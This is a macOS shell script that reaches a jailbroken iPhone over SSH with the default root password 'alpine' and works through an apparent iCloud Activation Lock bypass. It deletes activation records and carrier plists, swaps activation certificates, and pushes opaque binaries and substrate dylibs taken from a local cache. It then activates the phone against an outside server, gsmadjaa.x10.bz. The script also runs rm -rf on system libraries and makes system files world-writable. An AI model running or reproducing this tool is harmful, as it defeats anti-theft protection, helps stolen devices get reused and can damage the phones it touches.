
folderSystem="/System/Library/PrivateFrameworks/MobileActivation.framework/Support/Certificates";
folderDaemon="/System/Library/LaunchDaemons";
folder="/Users/$(whoami)/Desktop/tmp";
folderBin="$folder/libs";
/Users/$(whoami)/Desktop/tmp/libs/iproxy 2222 22 &>log&rm ~/.ssh/known_hosts;
/Users/$(whoami)/Desktop/tmp/libs/idevicepair pair;
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'mount -o rw,union,update /';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'snappy -f / -r `snappy -f / -l | sed -n 2p` -t orig-fs';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm -rf /usr/libexec/substrate';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm -rf /usr/libexec/substrated';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm -rf /usr/bin/cycc';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm -rf /usr/bin/cynject';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm -rf /./Library/Frameworks/*';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm -rf /usr/lib/cycript0.9';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm -rf /usr/lib/libsubstrate.dylib';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm -rf /Library/MobileSubstrate';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm -rf /usr/include/substrate.h';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm -rf /usr/lib/substrate';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'chflags -R nouchg /private/var/containers/Data/System/*/Library/internal/../*';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm /private/var/containers/Data/System/*/Library/activation_records/*';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'chflags nouchg /private/var/wireless/Library/Preferences/com.apple.commcenter.device_specific_nobackup.plist';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'chflags nouchg /private/var/mobile/Library/Preferences/com.apple.purplebuddy.plist';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm /private/var/wireless/Library/Preferences/com.apple.commcenter.device_specific_nobackup.plist';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' scp -P 2222 -p "/Users/$(whoami)/Desktop/tmp/Cache/2" root@localhost:"/./MyUtils";
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' scp -P 2222 -p "/Users/$(whoami)/Desktop/tmp/Cache/1" root@localhost:"/./re.tar.lzma";
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' scp -P 2222 -p "/Users/$(whoami)/Desktop/tmp/Cache/lzma" root@localhost:"/./lzma";
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'chmod +x /./lzma';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 '/./lzma -d -v /./re.tar.lzma';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'tar -xvf /./re.tar -C /./';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'tar -xvf /./MyUtils -C /./';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm /./lzma /./re.tar /./MyUtils';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'chmod -R 755 /bin /sbin /usr/bin /usr/sbin';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'BasebandON';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'chmod 777 /usr/libexec/substrate* /usr/lib/libsusbtrate.dylib /usr/include/substrate.h';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 '/usr/libexec/substrate';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 '/usr/libexec/substrated';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'BasebandON';
/Users/$(whoami)/Desktop/tmp/libs/ideviceactivation deactivate;
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' scp -P 2222 -p "/Users/$(whoami)/Desktop/tmp/Cache/3" root@localhost:"/./Library/MobileSubstrate/DynamicLibraries/untethered.dylib";
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' scp -P 2222 -p "/Users/$(whoami)/Desktop/tmp/Cache/4" root@localhost:"/./Library/MobileSubstrate/DynamicLibraries/untethered.plist";
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'chmod 777 /Library/MobileSubstrate/DynamicLibraries/untethered.dylib';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'cp -rp /./System/Library/PrivateFrameworks/MobileActivation.framework/Support/Certificates/FactoryActivation.pem /./System/Library/PrivateFrameworks/MobileActivation.framework/Support/Certificates/RaptorActivation.pem';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'launchctl stop com.apple.mobileactivationd';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'launchctl start com.apple.mobileactivationd';
sleep 5;
/Users/$(whoami)/Desktop/tmp/libs/ideviceactivation activate -d -s https://gsmadjaa.x10.bz/server/Activate.php;
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 '/usr/libexec/substrate';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 '/usr/libexec/substrated';
/Users/$(whoami)/Desktop/tmp/libs/idevicepair pair;
/Users/$(whoami)/Desktop/tmp/libs/ideviceactivation activate -d -s https://gsmadjaa.x10.bz/server/Activate.php;
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm /Library/MobileSubstrate/DynamicLibraries/untethered.dylib';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm /Library/MobileSubstrate/DynamicLibraries/untethered.plist';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' scp -P 2222 -p "/Users/$(whoami)/Desktop/tmp/Cache/5g" root@localhost:"/./Library/MobileSubstrate/DynamicLibraries/iuntethered.dylib";
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' scp -P 2222 -p "/Users/$(whoami)/Desktop/tmp/Cache/6" root@localhost:"/./Library/MobileSubstrate/DynamicLibraries/iuntethered.plist";
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'chmod 777 /Library/MobileSubstrate/DynamicLibraries/iuntethered.dylib';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'CommDevice';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'launchctl stop com.apple.mobileactivationd';
sleep 5;
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'launchctl stop com.apple.CommCenter';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'launchctl start com.apple.CommCenter';
sleep 10;
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'launchctl start com.apple.mobileactivationd';
sleep 5;
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm /Library/MobileSubstrate/DynamicLibraries/iuntethered.dylib';
/Users/$(whoami)/Desktop/tmp/libs/sshpass -p 'alpine' ssh -o StrictHostKeyChecking=no root@localhost -p2222 'rm /Library/MobileSubstrate/DynamicLibraries/iuntethered.plist';